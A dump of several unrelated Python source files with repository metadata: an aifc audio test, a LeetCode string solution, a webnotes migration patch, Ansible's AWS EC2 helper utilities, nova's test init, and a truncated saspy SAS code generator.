    def test_write_aiff_by_extension(self):
        # An .aiff filename forces uncompressed AIFF output regardless of the
        # compression type requested via setparams.
        sampwidth = 2
        filename = TESTFN + '.aiff'
        self.addCleanup(unlink, filename)
        fout = self.fout = aifc.open(filename, 'wb')
        fout.setparams((1, sampwidth, 1, 1, 'ULAW', ''))
        frames = '\x00' * fout.getnchannels() * sampwidth
        fout.writeframes(frames)
        fout.close()
        f = self.f = aifc.open(filename, 'rb')
        self.assertEqual(f.getcomptype(), 'NONE')
        f.close()


def test_main():
    # Each test class is listed exactly once (the original listed
    # AifcPCM16Test twice, running it redundantly).
    run_unittest(AifcPCM8Test, AifcPCM16Test, AifcPCM24Test,
                 AifcPCM32Test, AifcULAWTest,
                 AifcMiscTest, AIFCLowLevelTest)


if __name__ == "__main__":
    test_main()
l33tdaima/l33tdaima
refs/heads/master
p859e/buddy_string.py
1
class Solution:
    def buddyStrings(self, A: str, B: str) -> bool:
        """Return True iff swapping exactly one pair of positions in A yields B."""
        if len(A) != len(B):
            return False
        if A == B:
            # Swapping two equal characters leaves the string unchanged,
            # which is possible exactly when some character repeats.
            return len(set(A)) < len(A)
        mismatches = [i for i, (a, b) in enumerate(zip(A, B)) if a != b]
        if len(mismatches) != 2:
            return False
        i, j = mismatches
        # The two mismatched positions must be each other's swap.
        return A[i] == B[j] and A[j] == B[i]


# TESTS
tests = [
    ("ab", "ba", True),
    ("ab", "ab", False),
    ("aa", "aa", True),
    ("aaaaaaabc", "aaaaaaacb", True),
    ("", "aa", False),
]
for A, B, expected in tests:
    actual = Solution().buddyStrings(A, B)
    print("Are", A, "and", B, "buddy strings? ->", actual)
    assert actual == expected
gangadhar-kadam/powapp
refs/heads/master
patches/january_2013/file_list_rename_returns.py
30
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt import webnotes from webnotes.utils import get_base_path import os def execute(): # find out when was the file list patch run res = webnotes.conn.sql("""select applied_on from `__PatchLog` where patch='patches.december_2012.file_list_rename' order by applied_on desc limit 1""") if res: patch_date = res[0][0].date() files_path = os.path.join(get_base_path(), "public", "files") change_map = {} file_data_list = webnotes.conn.sql("""select name, file_name from `tabFile Data` where date(modified) <= %s and ifnull(file_url, '')='' and name like "%%-%%" """, patch_date) # print patch_date # print file_data_list # print files_path for fid, file_name in file_data_list: if os.path.exists(os.path.join(files_path, fid)): new_fid, new_file_name = fid.replace("-", ""), file_name.replace("-", "") try: webnotes.conn.sql("""update `tabFile Data` set name=%s, file_name=%s where name=%s""", (new_fid, new_file_name, fid)) os.rename(os.path.join(files_path, fid), os.path.join(files_path, new_fid)) change_map[",".join((file_name, fid))] = ",".join((new_file_name, new_fid)) except Exception, e: # if duplicate entry, then dont update if e[0]!=1062: raise changed_keys = change_map.keys() for dt in webnotes.conn.sql("""select distinct parent from tabDocField where fieldname='file_list'"""): try: data = webnotes.conn.sql("""select name, file_list from `tab%s` where ifnull(file_list, '')!=''""" % dt[0]) for name, file_list in data: new_file_list = [] file_list = file_list.split("\n") for f in file_list: if f in changed_keys: new_file_list.append(change_map[f]) else: new_file_list.append(f) if new_file_list != file_list: webnotes.conn.sql("""update `tab%s` set file_list=%s where name=%s""" % (dt[0], "%s", "%s"), ("\n".join(new_file_list), name)) except Exception, e: if e[0]!=1146: raise
cuongnv23/ansible
refs/heads/devel
lib/ansible/module_utils/ec2.py
5
# This code is part of Ansible, but is an independent component. # This particular file snippet, and this file snippet only, is BSD licensed. # Modules you write using this snippet, which is embedded dynamically by Ansible # still belong to the author of the module, and may assign their own license # to the complete work. # # Copyright (c), Michael DeHaan <michael.dehaan@gmail.com>, 2012-2013 # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE # USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import os
import re
from time import sleep

from ansible.module_utils._text import to_native
from ansible.module_utils.cloud import CloudRetry

try:
    import boto
    import boto.ec2  # boto does weird import stuff
    HAS_BOTO = True
except ImportError:
    HAS_BOTO = False

try:
    import boto3
    import botocore
    HAS_BOTO3 = True
except ImportError:  # narrowed from a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt
    HAS_BOTO3 = False

from ansible.module_utils.six import string_types, binary_type, text_type


class AnsibleAWSError(Exception):
    """Base exception for AWS-related failures raised by these utilities."""
    pass


def _botocore_exception_maybe():
    """
    Allow for boto3 not being installed when using these utils by wrapping
    botocore.exceptions instead of assigning from it directly.
    """
    if HAS_BOTO3:
        return botocore.exceptions.ClientError
    # type(None) is never raised, so retry matching becomes a no-op without boto3
    return type(None)


class AWSRetry(CloudRetry):
    """CloudRetry subclass that retries on transient AWS API error codes."""

    base_class = _botocore_exception_maybe()

    @staticmethod
    def status_code_from_exception(error):
        # botocore ClientError carries the AWS error code in its response dict
        return error.response['Error']['Code']

    @staticmethod
    def found(response_code, catch_extra_error_codes):
        # This list of failures is based on this API Reference:
        # http://docs.aws.amazon.com/AWSEC2/latest/APIReference/errors-overview.html
        #
        # TooManyRequestsException comes from inside botocore when it
        # does retrys, unfortunately however it does not try long
        # enough to allow some services such as API Gateway to
        # complete configuration. At the moment of writing there is a
        # botocore/boto3 bug open to fix this:
        # https://github.com/boto/boto3/issues/876 (and linked PRs etc)
        retry_on = [
            'RequestLimitExceeded', 'Unavailable', 'ServiceUnavailable',
            'InternalFailure', 'InternalError', 'TooManyRequestsException',
            'Throttling'
        ]
        if catch_extra_error_codes:
            retry_on.extend(catch_extra_error_codes)

        # NOTE(review): the '.' is unescaped, so this also matches e.g.
        # "FooXNotFound"; presumably r'^\w+\.NotFound' was intended — kept
        # as-is to preserve behavior.
        not_found = re.compile(r'^\w+.NotFound')
        return response_code in retry_on or not_found.search(response_code)


def boto3_conn(module, conn_type=None, resource=None, region=None, endpoint=None, **params):
    """Build a boto3 client/resource, converting bad conn_type into fail_json.

    Thin module-aware wrapper around :func:`_boto3_conn`.
    """
    try:
        return _boto3_conn(conn_type=conn_type, resource=resource,
                           region=region, endpoint=endpoint, **params)
    except ValueError:
        module.fail_json(msg='There is an issue in the code of the module. You must specify either both, resource or client to the conn_type '
                             'parameter in the boto3_conn function call')


def _boto3_conn(conn_type=None, resource=None, region=None, endpoint=None, **params):
    """Create a boto3 client, resource, or (client, resource) pair.

    :param conn_type: one of 'client', 'resource' or 'both'
    :param resource: AWS service name (e.g. 'ec2') — passed to boto3
    :raises ValueError: if conn_type is not one of the three allowed values
    """
    profile = params.pop('profile_name', None)

    if conn_type not in ['both', 'resource', 'client']:
        raise ValueError('There is an issue in the calling code. You '
                         'must specify either both, resource, or client to '
                         'the conn_type parameter in the boto3_conn function '
                         'call')

    if conn_type == 'resource':
        resource = boto3.session.Session(profile_name=profile).resource(resource, region_name=region, endpoint_url=endpoint, **params)
        return resource
    elif conn_type == 'client':
        client = boto3.session.Session(profile_name=profile).client(resource, region_name=region, endpoint_url=endpoint, **params)
        return client
    else:
        # 'both': build each from its own session
        client = boto3.session.Session(profile_name=profile).client(resource, region_name=region, endpoint_url=endpoint, **params)
        resource = boto3.session.Session(profile_name=profile).resource(resource, region_name=region, endpoint_url=endpoint, **params)
        return client, resource


# Alias kept for inventory scripts that connect without an AnsibleModule.
boto3_inventory_conn = _boto3_conn


def boto_exception(err):
    """
    Extracts the error message from a boto exception.

    :param err: Exception from boto
    :return: Error message
    """
    if hasattr(err, 'error_message'):
        error = err.error_message
    elif hasattr(err, 'message'):
        error = str(err.message) + ' ' + str(err) + ' - ' + str(type(err))
    else:
        error = '%s: %s' % (Exception, err)

    return error


def aws_common_argument_spec():
    """Argument spec fragment shared by all AWS modules (credentials etc.)."""
    return dict(
        ec2_url=dict(),
        aws_secret_key=dict(aliases=['ec2_secret_key', 'secret_key'], no_log=True),
        aws_access_key=dict(aliases=['ec2_access_key', 'access_key']),
        validate_certs=dict(default=True, type='bool'),
        security_token=dict(aliases=['access_token'], no_log=True),
        profile=dict(),
    )


def ec2_argument_spec():
    """Common argument spec plus the region option used by EC2 modules."""
    spec = aws_common_argument_spec()
    spec.update(
        dict(
            region=dict(aliases=['aws_region', 'ec2_region']),
        )
    )
    return spec


def get_aws_connection_info(module, boto3=False):
    """Resolve region, endpoint URL and credential parameters.

    Checks module args first, then environment variables, then the boto
    config file.  The `boto3` flag selects which parameter names the
    returned dict uses (boto3 vs legacy boto); it deliberately shadows the
    module name inside this function for backward compatibility.

    :return: tuple of (region, ec2_url, boto_params)
    """
    # Check module args for credentials, then check environment vars
    # access_key
    ec2_url = module.params.get('ec2_url')
    access_key = module.params.get('aws_access_key')
    secret_key = module.params.get('aws_secret_key')
    security_token = module.params.get('security_token')
    region = module.params.get('region')
    profile_name = module.params.get('profile')
    validate_certs = module.params.get('validate_certs')

    if not ec2_url:
        if 'AWS_URL' in os.environ:
            ec2_url = os.environ['AWS_URL']
        elif 'EC2_URL' in os.environ:
            ec2_url = os.environ['EC2_URL']

    if not access_key:
        if os.environ.get('AWS_ACCESS_KEY_ID'):
            access_key = os.environ['AWS_ACCESS_KEY_ID']
        elif os.environ.get('AWS_ACCESS_KEY'):
            access_key = os.environ['AWS_ACCESS_KEY']
        elif os.environ.get('EC2_ACCESS_KEY'):
            access_key = os.environ['EC2_ACCESS_KEY']
        elif HAS_BOTO and boto.config.get('Credentials', 'aws_access_key_id'):
            access_key = boto.config.get('Credentials', 'aws_access_key_id')
        elif HAS_BOTO and boto.config.get('default', 'aws_access_key_id'):
            access_key = boto.config.get('default', 'aws_access_key_id')
        else:
            # in case access_key came in as empty string
            access_key = None

    if not secret_key:
        if os.environ.get('AWS_SECRET_ACCESS_KEY'):
            secret_key = os.environ['AWS_SECRET_ACCESS_KEY']
        elif os.environ.get('AWS_SECRET_KEY'):
            secret_key = os.environ['AWS_SECRET_KEY']
        elif os.environ.get('EC2_SECRET_KEY'):
            secret_key = os.environ['EC2_SECRET_KEY']
        elif HAS_BOTO and boto.config.get('Credentials', 'aws_secret_access_key'):
            secret_key = boto.config.get('Credentials', 'aws_secret_access_key')
        elif HAS_BOTO and boto.config.get('default', 'aws_secret_access_key'):
            secret_key = boto.config.get('default', 'aws_secret_access_key')
        else:
            # in case secret_key came in as empty string
            secret_key = None

    if not region:
        if 'AWS_REGION' in os.environ:
            region = os.environ['AWS_REGION']
        elif 'AWS_DEFAULT_REGION' in os.environ:
            region = os.environ['AWS_DEFAULT_REGION']
        elif 'EC2_REGION' in os.environ:
            region = os.environ['EC2_REGION']
        else:
            if not boto3:
                if HAS_BOTO:
                    # boto.config.get returns None if config not found
                    region = boto.config.get('Boto', 'aws_region')
                    if not region:
                        region = boto.config.get('Boto', 'ec2_region')
                else:
                    module.fail_json(msg="boto is required for this module. Please install boto and try again")
            elif HAS_BOTO3:
                # here we don't need to make an additional call, will default to 'us-east-1' if the below evaluates to None.
                region = botocore.session.get_session().get_config_variable('region')
            else:
                module.fail_json(msg="Boto3 is required for this module. Please install boto3 and try again")

    if not security_token:
        if os.environ.get('AWS_SECURITY_TOKEN'):
            security_token = os.environ['AWS_SECURITY_TOKEN']
        elif os.environ.get('AWS_SESSION_TOKEN'):
            security_token = os.environ['AWS_SESSION_TOKEN']
        elif os.environ.get('EC2_SECURITY_TOKEN'):
            security_token = os.environ['EC2_SECURITY_TOKEN']
        elif HAS_BOTO and boto.config.get('Credentials', 'aws_security_token'):
            security_token = boto.config.get('Credentials', 'aws_security_token')
        elif HAS_BOTO and boto.config.get('default', 'aws_security_token'):
            security_token = boto.config.get('default', 'aws_security_token')
        else:
            # in case secret_token came in as empty string
            security_token = None

    if HAS_BOTO3 and boto3:
        boto_params = dict(aws_access_key_id=access_key,
                           aws_secret_access_key=secret_key,
                           aws_session_token=security_token)
        boto_params['verify'] = validate_certs

        if profile_name:
            boto_params['profile_name'] = profile_name
    else:
        boto_params = dict(aws_access_key_id=access_key,
                           aws_secret_access_key=secret_key,
                           security_token=security_token)

        # only set profile_name if passed as an argument
        if profile_name:
            boto_params['profile_name'] = profile_name

        boto_params['validate_certs'] = validate_certs

    # boto/boto3 expect text, not bytes, for every parameter value
    for param, value in boto_params.items():
        if isinstance(value, binary_type):
            boto_params[param] = text_type(value, 'utf-8', 'strict')

    return region, ec2_url, boto_params


def get_ec2_creds(module):
    ''' for compatibility mode with old modules that don't/can't yet
        use ec2_connect method '''
    region, ec2_url, boto_params = get_aws_connection_info(module)
    return ec2_url, boto_params['aws_access_key_id'], boto_params['aws_secret_access_key'], region


def boto_fix_security_token_in_profile(conn, profile_name):
    ''' monkey patch for boto issue boto/boto#2100 '''
    profile = 'profile ' + profile_name
    if boto.config.has_option(profile, 'aws_security_token'):
        conn.provider.set_security_token(boto.config.get(profile, 'aws_security_token'))
    return conn


def connect_to_aws(aws_module, region, **params):
    """Connect a legacy boto service module (e.g. boto.ec2) to a region.

    :raises AnsibleAWSError: if the profile is missing, the region is
        unknown to the installed boto, or the connection cannot be made.
    """
    try:
        conn = aws_module.connect_to_region(region, **params)
    except(boto.provider.ProfileNotFoundError):
        raise AnsibleAWSError("Profile given for AWS was not found. Please fix and retry.")
    if not conn:
        # connect_to_region returns None for unknown regions; distinguish
        # "region missing from boto's endpoint list" from other failures
        if region not in [aws_module_region.name for aws_module_region in aws_module.regions()]:
            raise AnsibleAWSError("Region %s does not seem to be available for aws module %s. If the region definitely exists, you may need to upgrade "
                                  "boto or extend with endpoints_path" % (region, aws_module.__name__))
        else:
            raise AnsibleAWSError("Unknown problem connecting to region %s for aws module %s." % (region, aws_module.__name__))
    if params.get('profile_name'):
        conn = boto_fix_security_token_in_profile(conn, params['profile_name'])
    return conn


def ec2_connect(module):
    """ Return an ec2 connection"""
    region, ec2_url, boto_params = get_aws_connection_info(module)

    # If we have a region specified, connect to its endpoint.
    if region:
        try:
            ec2 = connect_to_aws(boto.ec2, region, **boto_params)
        except (boto.exception.NoAuthHandlerFound, AnsibleAWSError, boto.provider.ProfileNotFoundError) as e:
            module.fail_json(msg=str(e))
    # Otherwise, no region so we fallback to the old connection method
    elif ec2_url:
        try:
            ec2 = boto.connect_ec2_endpoint(ec2_url, **boto_params)
        except (boto.exception.NoAuthHandlerFound, AnsibleAWSError, boto.provider.ProfileNotFoundError) as e:
            module.fail_json(msg=str(e))
    else:
        module.fail_json(msg="Either region or ec2_url must be specified")

    return ec2


def _camel_to_snake(name):
    """Convert a CamelCase identifier to snake_case."""
    def prepend_underscore_and_lower(m):
        return '_' + m.group(0).lower()

    # `re` is imported at module level; the redundant in-function import
    # that used to live here has been removed.
    # Cope with pluralized abbreviations such as TargetGroupARNs
    # that would otherwise be rendered target_group_ar_ns
    plural_pattern = r'[A-Z]{3,}s$'
    s1 = re.sub(plural_pattern, prepend_underscore_and_lower, name)
    # Handle when there was nothing before the plural_pattern
    if s1.startswith("_") and not name.startswith("_"):
        s1 = s1[1:]
    # Remainder of solution seems to be https://stackoverflow.com/a/1176023
    first_cap_pattern = r'(.)([A-Z][a-z]+)'
    all_cap_pattern = r'([a-z0-9])([A-Z]+)'
    s2 = re.sub(first_cap_pattern, r'\1_\2', s1)
    return re.sub(all_cap_pattern, r'\1_\2', s2).lower()


def camel_dict_to_snake_dict(camel_dict):
    """Recursively convert all keys of a dict from CamelCase to snake_case."""
    def value_is_list(camel_list):
        # recurse into lists so nested dicts get converted too
        checked_list = []
        for item in camel_list:
            if isinstance(item, dict):
                checked_list.append(camel_dict_to_snake_dict(item))
            elif isinstance(item, list):
                checked_list.append(value_is_list(item))
            else:
                checked_list.append(item)

        return checked_list

    snake_dict = {}
    for k, v in camel_dict.items():
        if isinstance(v, dict):
            snake_dict[_camel_to_snake(k)] = camel_dict_to_snake_dict(v)
        elif isinstance(v, list):
            snake_dict[_camel_to_snake(k)] = value_is_list(v)
        else:
            snake_dict[_camel_to_snake(k)] = v

    return snake_dict


def snake_dict_to_camel_dict(snake_dict):
    """Recursively convert all keys of a dict from snake_case to camelCase."""
    def camelize(complex_type):
        if complex_type is None:
            return
        new_type = type(complex_type)()
        if isinstance(complex_type, dict):
            for key in complex_type:
                new_type[camel(key)] = camelize(complex_type[key])
        elif isinstance(complex_type, list):
            for i in range(len(complex_type)):
                new_type.append(camelize(complex_type[i]))
        else:
            return complex_type
        return new_type

    def camel(words):
        # first word stays lower-case: "foo_bar" -> "fooBar"
        return words.split('_')[0] + ''.join(x.capitalize() or '_' for x in words.split('_')[1:])

    return camelize(snake_dict)


def ansible_dict_to_boto3_filter_list(filters_dict):
    """ Convert an Ansible dict of filters to list of dicts that boto3 can use
    Args:
        filters_dict (dict): Dict of AWS filters.
    Basic Usage:
        >>> filters = {'some-aws-id': 'i-01234567'}
        >>> ansible_dict_to_boto3_filter_list(filters)
        [
            {
                'Name': 'some-aws-id',
                'Values': [
                    'i-01234567',
                ]
            }
        ]

    Returns:
        List: List of AWS filters and their values
        [
            {
                'Name': 'some-aws-id',
                'Values': [
                    'i-01234567',
                ]
            }
        ]
    """

    filters_list = []
    for k, v in filters_dict.items():
        filter_dict = {'Name': k}
        if isinstance(v, string_types):
            filter_dict['Values'] = [v]
        else:
            filter_dict['Values'] = v

        filters_list.append(filter_dict)

    return filters_list


def boto3_tag_list_to_ansible_dict(tags_list, tag_name_key_name='Key', tag_value_key_name='Value'):
    """ Convert a boto3 list of resource tags to a flat dict of key:value pairs
    Args:
        tags_list (list): List of dicts representing AWS tags.
        tag_name_key_name (str): Value to use as the key for all tag keys (useful because boto3 doesn't always use "Key")
        tag_value_key_name (str): Value to use as the key for all tag values (useful because boto3 doesn't always use "Value")
    Basic Usage:
        >>> tags_list = [{'Key': 'MyTagKey', 'Value': 'MyTagValue'}]
        >>> boto3_tag_list_to_ansible_dict(tags_list)
        {
            'MyTagKey': 'MyTagValue',
        }

    Returns:
        Dict: Dict of key:value pairs representing AWS tags
         {
            'MyTagKey': 'MyTagValue',
        }
    """

    tags_dict = {}
    for tag in tags_list:
        if tag_name_key_name in tag:
            tags_dict[tag[tag_name_key_name]] = tag[tag_value_key_name]

    return tags_dict


def ansible_dict_to_boto3_tag_list(tags_dict, tag_name_key_name='Key', tag_value_key_name='Value'):
    """ Convert a flat dict of key:value pairs representing AWS resource tags to a boto3 list of dicts
    Args:
        tags_dict (dict): Dict representing AWS resource tags.
        tag_name_key_name (str): Value to use as the key for all tag keys (useful because boto3 doesn't always use "Key")
        tag_value_key_name (str): Value to use as the key for all tag values (useful because boto3 doesn't always use "Value")
    Basic Usage:
        >>> tags_dict = {'MyTagKey': 'MyTagValue'}
        >>> ansible_dict_to_boto3_tag_list(tags_dict)
        [
            {
                'Key': 'MyTagKey',
                'Value': 'MyTagValue'
            }
        ]

    Returns:
        List: List of dicts containing tag keys and values
        [
            {
                'Key': 'MyTagKey',
                'Value': 'MyTagValue'
            }
        ]
    """

    tags_list = []
    for k, v in tags_dict.items():
        tags_list.append({tag_name_key_name: k, tag_value_key_name: to_native(v)})

    return tags_list


def get_ec2_security_group_ids_from_names(sec_group_list, ec2_connection, vpc_id=None, boto3=True):
    """ Return list of security group IDs from security group names. Note that security group names are not unique
     across VPCs.  If a name exists across multiple VPCs and no VPC ID is supplied, all matching IDs will be returned. This
     will probably lead to a boto exception if you attempt to assign both IDs to a resource so ensure you wrap the call in
     a try block
     """
    def get_sg_name(sg, boto3):
        if boto3:
            return sg['GroupName']
        else:
            return sg.name

    def get_sg_id(sg, boto3):
        if boto3:
            return sg['GroupId']
        else:
            return sg.id

    sec_group_id_list = []

    if isinstance(sec_group_list, string_types):
        sec_group_list = [sec_group_list]

    # Get all security groups
    if boto3:
        if vpc_id:
            filters = [
                {
                    'Name': 'vpc-id',
                    'Values': [
                        vpc_id,
                    ]
                }
            ]
            all_sec_groups = ec2_connection.describe_security_groups(Filters=filters)['SecurityGroups']
        else:
            all_sec_groups = ec2_connection.describe_security_groups()['SecurityGroups']
    else:
        if vpc_id:
            filters = {'vpc-id': vpc_id}
            all_sec_groups = ec2_connection.get_all_security_groups(filters=filters)
        else:
            all_sec_groups = ec2_connection.get_all_security_groups()

    unmatched = set(sec_group_list).difference(str(get_sg_name(all_sg, boto3)) for all_sg in all_sec_groups)
    sec_group_name_list = list(set(sec_group_list) - set(unmatched))

    if len(unmatched) > 0:
        # If we have unmatched names that look like an ID, assume they are
        # (`re` is imported at module level; removed redundant local import)
        sec_group_id_list[:] = [sg for sg in unmatched if re.match('sg-[a-fA-F0-9]+$', sg)]
        still_unmatched = [sg for sg in unmatched if not re.match('sg-[a-fA-F0-9]+$', sg)]
        if len(still_unmatched) > 0:
            raise ValueError("The following group names are not valid: %s" % ', '.join(still_unmatched))

    sec_group_id_list += [str(get_sg_id(all_sg, boto3)) for all_sg in all_sec_groups if str(get_sg_name(all_sg, boto3)) in sec_group_name_list]

    return sec_group_id_list


def sort_json_policy_dict(policy_dict):
    """ Sort any lists in an IAM JSON policy so that comparison of two policies with identical values but
    different orders will return true
    Args:
        policy_dict (dict): Dict representing IAM JSON policy.
    Basic Usage:
        >>> my_iam_policy = {'Principle': {'AWS': ["31", "7", "14", "101"]}}
        >>> sort_json_policy_dict(my_iam_policy)
    Returns:
        Dict: Will return a copy of the policy as a Dict but any List will be sorted
        {
            'Principle': {
                'AWS': [ '7', '14', '31', '101' ]
            }
        }
    """

    def value_is_list(my_list):

        checked_list = []
        for item in my_list:
            if isinstance(item, dict):
                checked_list.append(sort_json_policy_dict(item))
            elif isinstance(item, list):
                checked_list.append(value_is_list(item))
            else:
                checked_list.append(item)

        # Sort list. If it's a list of dictionaries, sort by tuple of key-value
        # pairs, since Python 3 doesn't allow comparisons such as `<` between dictionaries.
        checked_list.sort(key=lambda x: sorted(x.items()) if isinstance(x, dict) else x)
        return checked_list

    ordered_policy_dict = {}
    for key, value in policy_dict.items():
        if isinstance(value, dict):
            ordered_policy_dict[key] = sort_json_policy_dict(value)
        elif isinstance(value, list):
            ordered_policy_dict[key] = value_is_list(value)
        else:
            ordered_policy_dict[key] = value

    return ordered_policy_dict


def map_complex_type(complex_type, type_map):
    """
        Allows to cast elements within a dictionary to a specific type
        Example of usage:

        DEPLOYMENT_CONFIGURATION_TYPE_MAP = {
            'maximum_percent': 'int',
            'minimum_healthy_percent': 'int'
        }

        deployment_configuration = map_complex_type(module.params['deployment_configuration'],
                                                    DEPLOYMENT_CONFIGURATION_TYPE_MAP)

        This ensures all keys within the root element are casted and valid integers
    """

    if complex_type is None:
        return
    new_type = type(complex_type)()
    if isinstance(complex_type, dict):
        for key in complex_type:
            if key in type_map:
                if isinstance(type_map[key], list):
                    new_type[key] = map_complex_type(
                        complex_type[key],
                        type_map[key][0])
                else:
                    new_type[key] = map_complex_type(
                        complex_type[key],
                        type_map[key])
            else:
                return complex_type
    elif isinstance(complex_type, list):
        for i in range(len(complex_type)):
            new_type.append(map_complex_type(
                complex_type[i],
                type_map))
    elif type_map:
        # look up the builtin named by the type_map string (e.g. 'int') and cast
        return globals()['__builtins__'][type_map](complex_type)
    return new_type


def compare_aws_tags(current_tags_dict, new_tags_dict, purge_tags=True):
    """
    Compare two dicts of AWS tags. Dicts are expected to of been created using 'boto3_tag_list_to_ansible_dict' helper function.
    Two dicts are returned - the first is tags to be set, the second is any tags to remove. Since the AWS APIs differ
    these may not be able to be used out of the box.

    :param current_tags_dict:
    :param new_tags_dict:
    :param purge_tags:
    :return: tag_key_value_pairs_to_set: a dict of key value pairs that need to be set in AWS. If all tags are identical this dict will be empty
    :return: tag_keys_to_unset: a list of key names (type str) that need to be unset in AWS. If no tags need to be unset this list will be empty
    """

    tag_key_value_pairs_to_set = {}
    tag_keys_to_unset = []

    for key in current_tags_dict.keys():
        if key not in new_tags_dict and purge_tags:
            tag_keys_to_unset.append(key)

    for key in set(new_tags_dict.keys()) - set(tag_keys_to_unset):
        if new_tags_dict[key] != current_tags_dict.get(key):
            tag_key_value_pairs_to_set[key] = new_tags_dict[key]

    return tag_key_value_pairs_to_set, tag_keys_to_unset
SUSE-Cloud/nova
refs/heads/stable/havana
nova/tests/__init__.py
13
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ :mod:`nova.tests` -- Nova Unittests ===================================================== .. automodule:: nova.tests :platform: Unix """ # TODO(mikal): move eventlet imports to nova.__init__ once we move to PBR import os import sys # NOTE(mikal): All of this is because if dnspython is present in your # environment then eventlet monkeypatches socket.getaddrinfo() with an # implementation which doesn't work for IPv6. What we're checking here is # that the magic environment variable was set when the import happened. if ('eventlet' in sys.modules and os.environ.get('EVENTLET_NO_GREENDNS', '').lower() != 'yes'): raise ImportError('eventlet imported before nova/cmd/__init__ ' '(env var set to %s)' % os.environ.get('EVENTLET_NO_GREENDNS')) os.environ['EVENTLET_NO_GREENDNS'] = 'yes' import eventlet eventlet.monkey_patch(os=False)
jld23/saspy
refs/heads/master
saspy/sasproccommons.py
1
# # Copyright SAS Institute # # Licensed under the Apache License, Version 2.0 (the License); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import logging import warnings import re from collections import OrderedDict from saspy.sasdata import SASdata from saspy.sasresults import SASresults # from pdb import set_trace as bp class Codegen(object): """ Class to generate code for submission to the SAS system. """ def __init__(self, key, args, **kwargs): self._key = key self._args = args @property def key(self): return self._key @property def codestmt(self): args = self._args key = self._key if self._key in ['code', 'save'] and isinstance(self._args, str): args = "file = '{}'".format(args) if self._key in ['output', 'out'] and isinstance(self._args, str): if not len(self.outmeth): if bool(re.match(r'(\bout\W*=+)',args, flags=re.IGNORECASE)): return "output {};\n".format(args) else: return "output out= {};\n".format(args) return args if self._key in ['selection'] and isinstance(self._args, str): if self._args.lower().strip() in ['none', 'forward', 'backward', 'stepwise', 'forwardswap','lar', 'lasso']: if len(self._args.split()) == 1: return "selection method={};\n".format(self._args) else: raise SyntaxError("selection method: '{}' is not valid".format(self._args)) if self._key in ['freq', 'weight'] and len(args.split()) > 1: raise SyntaxError('ERROR in code submission. 
{} can only have one variable and you submitted: {}'.format(self._key, args)) if isinstance(self._args, (list, tuple)): args = " ".join(self._args) if len(self._args) < 1: raise SyntaxError("The {} list has no members".format(self._key)) elif isinstance(self._args, bool): if self._args == False: return '' if self._key in ['level', 'estimate', 'irregular', 'slope', 'autotune']: args = '' elif self._key == 'partition': return "partition fraction(test=0 validation=.30 seed=9878);\n" elif self._key in ['save']: return "{0} {2}={1}.{2} {3}={1}.{3} {4}={1}.{4} {5}={1}.{5} {6}={1}.{6};\n"\ .format(self._key, self.objname, "fit", "importance", "model", "nodestats", "rules" ) elif self._key in ['out', 'output']: if not len(self.outmeth): return "output out={}.{};\n".format(self.objname, '_output') return '{}.{}'.format(self.objname, '_output') elif isinstance(self._args, dict): try: c = '' length = 0 for k,v in self._args.items(): if k not in ['interval', 'nominal']: raise KeyError keystr = k if self.objtype.casefold() == 'hpneural': if keystr == 'interval': keystr = 'int' else: keystr = 'nom' if isinstance(v, str): if self._key.casefold() == 'target': length += len(v.split()) c += "{0} {1} /level={2};\n".format(self._key, self._args[k], keystr) elif isinstance(self._args[k], (list, tuple)): if self._key.casefold() == 'target': length += len(v) c += "{0} {1} /level={2};\n".format(self._key, " ".join(self._args[k]), keystr) if self._key.casefold() == 'target' and not length==1: raise SyntaxError return c except SyntaxError: print("SyntaxError: TARGET can only have one variable") except KeyError: if self._key.casefold() == 'selection': if bool(self._args): # is the dictionary empty m = self._args.pop('method', '') me = self._args.pop('maxeffects', None) if me is not None: if int(me) > 0 and m != 'backward': self._args['maxeffects'] = me d = self._args.pop('details', '') dstr = '' if len(d) > 0: dstr = 'details = %s' % d return "selection method={} ({}) {}\n;".format(m, ' 
